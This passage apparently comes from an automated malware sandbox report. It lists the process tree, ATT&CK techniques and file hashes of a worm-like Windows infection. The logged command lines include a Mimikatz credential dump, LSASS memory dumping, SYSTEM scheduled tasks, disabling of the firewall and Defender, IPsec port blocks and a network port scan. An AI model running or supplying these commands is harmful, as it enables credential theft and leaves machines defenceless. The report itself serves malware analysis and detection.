  - System Location Discovery: System Language Discovery
  PID:5004
- - C:\Windows\buzcwvvny\Corporate\vfshost.exe
    C:\Windows\buzcwvvny\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:4556
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "mpbkiglcb" /ru system /tr "cmd /c C:\Windows\ime\ibebikp.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4280
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:428
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /sc minute /mo 1 /tn "mpbkiglcb" /ru system /tr "cmd /c C:\Windows\ime\ibebikp.exe"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:3792
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "fklitvbmu" /ru system /tr "cmd /c echo Y|cacls C:\Windows\tmbllbvl\ibebikp.exe /p everyone:F"
  2⤵
  PID:3456
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3240
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /sc minute /mo 1 /tn "fklitvbmu" /ru system /tr "cmd /c echo Y|cacls C:\Windows\tmbllbvl\ibebikp.exe /p everyone:F"
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:4276
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "jbtbicikb" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\ltbmbiubv\ttittb.exe /p everyone:F"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2636
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1868
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /sc minute /mo 1 /tn "jbtbicikb" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\ltbmbiubv\ttittb.exe /p everyone:F"
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:1472
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:2416
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  PID:1256
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:3676
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static set policy name=Bastards assign=y
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  PID:4336
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:4272
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  PID:1640
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:2148
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static set policy name=Bastards assign=y
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  PID:3136
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:2520
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:2900
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:1796
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static set policy name=Bastards assign=y
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:3724
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop SharedAccess
  2⤵
  PID:1660
- - C:\Windows\SysWOW64\net.exe
    net stop SharedAccess
    3⤵
    PID:4400
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SharedAccess
      4⤵
      System Location Discovery: System Language Discovery
      PID:3640
- C:\Windows\SysWOW64\cmd.exe
  cmd /c netsh firewall set opmode mode=disable
  2⤵
  - System Location Discovery: System Language Discovery
  PID:244
- - C:\Windows\SysWOW64\netsh.exe
    netsh firewall set opmode mode=disable
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:1932
- C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe
  C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe -accepteula -mp 780 C:\Windows\TEMP\buzcwvvny\780.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2388
- C:\Windows\SysWOW64\cmd.exe
  cmd /c netsh Advfirewall set allprofiles state off
  2⤵
  - System Location Discovery: System Language Discovery
  PID:852
- - C:\Windows\SysWOW64\netsh.exe
    netsh Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    - System Location Discovery: System Language Discovery
    PID:3680
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop MpsSvc
  2⤵
  PID:3920
- - C:\Windows\SysWOW64\net.exe
    net stop MpsSvc
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2108
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MpsSvc
      4⤵
      System Location Discovery: System Language Discovery
      PID:2432
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop WinDefend
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4564
- - C:\Windows\SysWOW64\net.exe
    net stop WinDefend
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4812
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop WinDefend
      4⤵
      System Location Discovery: System Language Discovery
      PID:4376
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop wuauserv
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4124
- - C:\Windows\SysWOW64\net.exe
    net stop wuauserv
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4604
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop wuauserv
      4⤵
      System Location Discovery: System Language Discovery
      PID:4840
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config MpsSvc start= disabled
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4472
- - C:\Windows\SysWOW64\sc.exe
    sc config MpsSvc start= disabled
    3⤵
    - Launches sc.exe
    PID:3944
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config SharedAccess start= disabled
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3960
- - C:\Windows\SysWOW64\sc.exe
    sc config SharedAccess start= disabled
    3⤵
    - Launches sc.exe
    - System Location Discovery: System Language Discovery
    PID:3984
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config WinDefend start= disabled
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4896
- - C:\Windows\SysWOW64\sc.exe
    sc config WinDefend start= disabled
    3⤵
    - Launches sc.exe
    - System Location Discovery: System Language Discovery
    PID:1700
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config wuauserv start= disabled
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3924
- - C:\Windows\SysWOW64\sc.exe
    sc config wuauserv start= disabled
    3⤵
    - Launches sc.exe
    - System Location Discovery: System Language Discovery
    PID:2872
- C:\Windows\TEMP\xohudmc.exe
  C:\Windows\TEMP\xohudmc.exe
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  - Suspicious use of SetWindowsHookEx
  PID:4984
- C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe
  C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe -accepteula -mp 340 C:\Windows\TEMP\buzcwvvny\340.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:4064
- C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe
  C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe -accepteula -mp 2116 C:\Windows\TEMP\buzcwvvny\2116.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2680
- C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe
  C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe -accepteula -mp 2588 C:\Windows\TEMP\buzcwvvny\2588.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:1948
- C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe
  C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe -accepteula -mp 2804 C:\Windows\TEMP\buzcwvvny\2804.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:1796
- C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe
  C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe -accepteula -mp 2856 C:\Windows\TEMP\buzcwvvny\2856.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2000
- C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe
  C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe -accepteula -mp 3024 C:\Windows\TEMP\buzcwvvny\3024.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:1660
- C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe
  C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe -accepteula -mp 3928 C:\Windows\TEMP\buzcwvvny\3928.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:4816
- C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe
  C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe -accepteula -mp 4032 C:\Windows\TEMP\buzcwvvny\4032.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2508
- C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe
  C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe -accepteula -mp 3004 C:\Windows\TEMP\buzcwvvny\3004.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:3388
- C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe
  C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe -accepteula -mp 3176 C:\Windows\TEMP\buzcwvvny\3176.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:4472
- C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe
  C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe -accepteula -mp 2328 C:\Windows\TEMP\buzcwvvny\2328.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:4564
- C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe
  C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe -accepteula -mp 4744 C:\Windows\TEMP\buzcwvvny\4744.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:5104
- C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe
  C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe -accepteula -mp 764 C:\Windows\TEMP\buzcwvvny\764.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:1436
- C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe
  C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe -accepteula -mp 4324 C:\Windows\TEMP\buzcwvvny\4324.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:3384
- C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe
  C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe -accepteula -mp 1464 C:\Windows\TEMP\buzcwvvny\1464.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:4620
- C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe
  C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe -accepteula -mp 3564 C:\Windows\TEMP\buzcwvvny\3564.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:3404
- C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe
  C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe -accepteula -mp 60 C:\Windows\TEMP\buzcwvvny\60.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:996
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c C:\Windows\buzcwvvny\mmzbiruiz\scan.bat
  2⤵
  PID:3764
- - C:\Windows\buzcwvvny\mmzbiruiz\lubvuzbtm.exe
    lubvuzbtm.exe TCP 181.215.0.1 181.215.255.255 7001 512 /save
    3⤵
    - Executes dropped EXE
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    PID:4708
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
  2⤵
  PID:2136
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:4264
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D users
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1288
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:1116
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
    3⤵
    PID:5024
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3388
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4448

C:\Windows\SysWOW64\cuwoqc.exe
C:\Windows\SysWOW64\cuwoqc.exe
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:3300

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\ltbmbiubv\ttittb.exe /p everyone:F
1⤵
PID:1640
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
  2⤵
  PID:2276
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\TEMP\ltbmbiubv\ttittb.exe /p everyone:F
  2⤵
  PID:3128

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c C:\Windows\ime\ibebikp.exe
1⤵
PID:3260
- C:\Windows\ime\ibebikp.exe
  C:\Windows\ime\ibebikp.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:3344

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\tmbllbvl\ibebikp.exe /p everyone:F
1⤵
PID:3704
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
  2⤵
  PID:1052
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\tmbllbvl\ibebikp.exe /p everyone:F
  2⤵
  PID:4044

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\tmbllbvl\ibebikp.exe /p everyone:F
1⤵
PID:2644
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
  2⤵
  PID:5372
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\tmbllbvl\ibebikp.exe /p everyone:F
  2⤵
  PID:5048

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c C:\Windows\ime\ibebikp.exe
1⤵
PID:2220
- C:\Windows\ime\ibebikp.exe
  C:\Windows\ime\ibebikp.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:1052

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\ltbmbiubv\ttittb.exe /p everyone:F
1⤵
PID:4372
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
  2⤵
  PID:5380
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\TEMP\ltbmbiubv\ttittb.exe /p everyone:F
  2⤵
  PID:5796

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Image File Execution Options Injection

T1546.012

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Image File Execution Options Injection

T1546.012

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Credential Access

OS Credential Dumping

T1003

LSASS Memory

T1003.001

Discovery

Network Service Discovery

T1046

Network Share Discovery

T1135

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Windows\SysWOW64\Packet.dll

Filesize
95KB

MD5
86316be34481c1ed5b792169312673fd

SHA1
6ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5

SHA256
49656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918

SHA512
3a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc

Download Submit
C:\Windows\SysWOW64\wpcap.dll

Filesize
275KB

MD5
4633b298d57014627831ccac89a2c50b

SHA1
e5f449766722c5c25fa02b065d22a854b6a32a5b

SHA256
b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9

SHA512
29590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3

Download Submit
C:\Windows\TEMP\buzcwvvny\2116.dmp

Filesize
4.2MB

MD5
5c036f4473894be7ab7dc5b1c0c953f4

SHA1
1abfe6d6a0a7fbd81eb20b8e7dbf7e3a8845288f

SHA256
1dcad4e9e1a0e1733abbc4ca2e52bf86432fb8b8c219a562b9cd21920cfa39db

SHA512
80058175942bd87cc4e243f07321a91c860c475e75f1e7fece22387354f59cf411a8c2a599b0af0753fc282f352c6f735baed86d1a11b18f078636c75f7ab02a

Download Submit
C:\Windows\TEMP\buzcwvvny\2328.dmp

Filesize
26.0MB

MD5
99ca2e73bf30e87114194a31049fd55e

SHA1
3e33b389915728326d6959b27ccd1be124860d3e

SHA256
172c6cfcf601954a42757d4845f11cb5fead0216d6a18195db62e335b674b0c4

SHA512
8da6253a239467f1210f16fc24d4bc7f8652e0a9dd1f004728f21337b5ac992ee7d1afeeb98187d8f1cb8aec74cb56f4248bdab79517772343cc5016ededf8a8

Download Submit
C:\Windows\TEMP\buzcwvvny\2588.dmp

Filesize
3.7MB

MD5
655f866a9f386df93b6d92d3aa95487d

SHA1
b9a414a8ad83f9870ebc5e94ecd19d298ac2f83e

SHA256
5874c2bc818c773b81ee11153080c46b2641356e07dcc7699dcbac2370a1fdb2

SHA512
258a8a0d19cfe5168717b82441b95431f836db92a008445e4b0c5030b9881f6bcab4707d31d4732b671d3c27d73b787eebe5ea2a42ce024ea15edae0d05cb3ea

Download Submit
C:\Windows\TEMP\buzcwvvny\2804.dmp

Filesize
2.9MB

MD5
ba7aa27532565b2980e57f27b28ecead

SHA1
51b73a8e4155a11a488250c939efcea1ebcfcc9d

SHA256
96ea2f295e746fb44013742eb2c54b772d95a323240696470b51a4e76e3ecc90

SHA512
02a60b28dd9c38e80d9b94c19ed11740cd9ce07a47d432eda117a3a55cc5d7374763df150e5d8b013c86684d4859064ac250529fa8d18025209ade6ad35d67b7

Download Submit
C:\Windows\TEMP\buzcwvvny\2856.dmp

Filesize
7.5MB

MD5
9d827b69cce4d37797fb0312c3e988b2

SHA1
292bbde3d3bb25cefefb0a242ff7b324568669c6

SHA256
7901fa456f9de1f058cb04cf8c4792b5c62c6136edd757870361e6e1656515e0

SHA512
d0e41c135ff2b1917bc872c44ab2cbb38b2d74f8e623d987ee14a7649bdf8199c307775fe4c16f1f831f2166c978f349e758ef4f729792229036922040b0efd3

Download Submit
C:\Windows\TEMP\buzcwvvny\3004.dmp

Filesize
4.3MB

MD5
f130737ed7334109141a4b6956590e21

SHA1
58a31a8327125c3c2a68d10e2f8a19b910777bef

SHA256
b17a99d0df3e2c974a132467fb4408190dc2c99f6c5727cab203444f26da9a7a

SHA512
f60faca2ab8ad8a12a1592406710c6f90401fdaed874c8ecadd0903c1f0e76152fc6c8f9b2a49ede9bc2d914b4598ca6ee179b4b68187787887255fed5e786ff

Download Submit
C:\Windows\TEMP\buzcwvvny\3024.dmp

Filesize
810KB

MD5
365d52fb5f3156ec5e7cb138273b7374

SHA1
c6cb4f29e45c7627f2d02acf4cfd5da82f10e4e1

SHA256
f4154d145d5ac4c5611544ebfaf970b32a95bf300bd18e9a146b92a2daa4e040

SHA512
815c3bca4d55699cb739e4994fa3de3c74e18cd1584aae1cd839f050ea1267ba98b99cac50767189ad02c9b5456a47904f5d9dbce332f756b1eb8eb4ec4df8af

Download Submit
C:\Windows\TEMP\buzcwvvny\3176.dmp

Filesize
44.2MB

MD5
3fb981b8108576b8490f2bbafa778fde

SHA1
abb4174b61c2ff10fc4646a87b364218f21e3ffa

SHA256
4eb3d3dc410d8a21cd8411ee46545f810c768a4e4a380d9a60fb0c194c2c9288

SHA512
252c32ebf14a8ef8f38abcbf47b554084b738238f98724fd25a001c4e3db7aaf636d5e63e633f4ce8ac48c1eaca8ea6ceb85694438375c472f5945385d9b0731

Download Submit
C:\Windows\TEMP\buzcwvvny\340.dmp

Filesize
34.4MB

MD5
692b169d925e5d57315d15c426604186

SHA1
ddcf1c6c16997e0b10f4b47bab172adeb2ab9bcd

SHA256
17e38d351adbbd69b04e8f79685ef0f92287cd3a90c4b86d4a6882e703231548

SHA512
58289e58c146ea0ba991b4b7cf1b6590a61ca2c1c1e1255b00469fb08339679d1efb754fd8446c33231e9913f0a1f15f75dfec25ffc37aece7f43ea932b0c94e

Download Submit
C:\Windows\TEMP\buzcwvvny\3928.dmp

Filesize
2.8MB

MD5
5fc2fc7d9c26207e2dd0a6358d751ad2

SHA1
90ad31cb399e4da021e4bb52beba61f151080e82

SHA256
8a1f764fa48ca64db1b48ea3a77ae33c2c5ab58921879655376e3ecf37aa1521

SHA512
541482657d5d3e04ca65875afc0529b4a2be67df2c3809d304767f86400f7eb8cd16d62cf8fe04bfe95e55909d5815e7ab0478ae477c30d95de2f68adb97580a

Download Submit
C:\Windows\TEMP\buzcwvvny\4032.dmp

Filesize
21.0MB

MD5
6aac1b65c7a92948c15b9a58c7a2c631

SHA1
dadb07c279ac032afde9e193c9e0f6c02c23420c

SHA256
ee80811fb64c591ad838b35e7a997bf10c559bfcf8bdcba98a837e9c8b1e0832

SHA512
a2e9a697f943e493d8e3d3dc6ad64d71d95d508d8664726e4c569badc7865c9407e478a6a42a025d0edcdab0c447ca13c8119a10867048403fe014d395040d44

Download Submit
C:\Windows\TEMP\buzcwvvny\4324.dmp

Filesize
2.9MB

MD5
0c84a8c19dc0690d548912daf2b8e04a

SHA1
8987a5e4d0bac37c65807d6037e91a3b7edd1968

SHA256
6c03754535d8315f01917a21a9dfe80e61607953ca91705eb9df14e24ebf7587

SHA512
d6296c61d31b1043ddfb9e4ebedc636819b7b469dc606045b45c9c027fac0cfff8fea3e7b97caeafa2d7feaf337604cfe200ab394a0beafc138a3c31ba861a77

Download Submit
C:\Windows\TEMP\buzcwvvny\4744.dmp

Filesize
1.2MB

MD5
a4a8bf1275ef1dcad43c87af3d8bcc93

SHA1
4d1770ce3905f78747aebd674c8bc1d9be6d6fab

SHA256
5c3ccc776a21ff14b771d66abe9942d576988defe58f6585483f44403ff72f6f

SHA512
0b7a5f7986fea9f999220164c755da3b4df7431923b00467fc953004c82a97fced090ecfa32ffc7c101275b5548444afac8712d1d2e272cfdf9c9246b907f425

Download Submit
C:\Windows\TEMP\buzcwvvny\764.dmp

Filesize
8.9MB

MD5
bbb13b589508b63ee8ce0a25591067aa

SHA1
a672a7c62fc692e1cb0f47e006f99a5703d6a1b0

SHA256
1917a7674c60656ef2ca1eefaf94326fd0ca75db0001d8467fc89bb5b6985eff

SHA512
c4e8fe60b83fc7626a8491ad9399d71db70e697bfe2e665759c614a45436a11761ab56898924861cd995e5accc603191d3deefa91a4b0c27510a6aa8e0c368c0

Download Submit
C:\Windows\TEMP\buzcwvvny\780.dmp

Filesize
1019KB

MD5
d384e0742c91f59677961de307d630af

SHA1
27021ef78f1aec788a8af1ff2493cab037112c3a

SHA256
877babead1ceb5e58c52a21f1913d14b4677c7eca50749f4a80020af2fe2e733

SHA512
7a240e9288a4bea027fa514eef0fb382de38e001332745f1637cec9edca5e20236ef7d00faa84ac7e18e60d873e21f925a4b6212a30dfd0c37529af35f1bed35

Download Submit
C:\Windows\TEMP\ltbmbiubv\config.json

Filesize
693B

MD5
f2d396833af4aea7b9afde89593ca56e

SHA1
08d8f699040d3ca94e9d46fc400e3feb4a18b96b

SHA256
d6ae7c6275b7a9b81ae4a4662c9704f7a68d5943fcc4b8d035e53db708659b34

SHA512
2f359d080c113d58a67f08cb44d9ab84b0dfd7392d6ddb56ca5d1b0e8aa37b984fac720e4373d4f23db967a3465fcf93cee66d7934d4211a22e1ebc640755f01

Download Submit
C:\Windows\Temp\buzcwvvny\vmgumyclb.exe

Filesize
126KB

MD5
e8d45731654929413d79b3818d6a5011

SHA1
23579d9ca707d9e00eb62fa501e0a8016db63c7e

SHA256
a26ae467f7b6f4bb23d117ca1e1795203821ca31ce6a765da9713698215ae9af

SHA512
df6bcdc59be84290f9ecb9fa0703a3053498f49f63d695584ffe595a88c014f4acf4864e1be0adf74531f62ce695be66b28cfd1b98e527ab639483802b5a37a6

Download Submit
C:\Windows\Temp\ltbmbiubv\ttittb.exe

Filesize
343KB

MD5
2b4ac7b362261cb3f6f9583751708064

SHA1
b93693b19ebc99da8a007fed1a45c01c5071fb7f

SHA256
a5a0268c15e00692a08af62e99347f6e37ee189e9db3925ebf60835e67aa7d23

SHA512
c154d2c6e809b0b48cc2529ea5745dc4fc3ddd82f8f9d0f7f827ff5590868c560d7bec42636cb61e27cc1c9b4ac2499d3657262826bbe0baa50f66b40e28b616

Download Submit
C:\Windows\Temp\nsyF55E.tmp\System.dll

Filesize
11KB

MD5
2ae993a2ffec0c137eb51c8832691bcb

SHA1
98e0b37b7c14890f8a599f35678af5e9435906e1

SHA256
681382f3134de5c6272a49dd13651c8c201b89c247b471191496e7335702fa59

SHA512
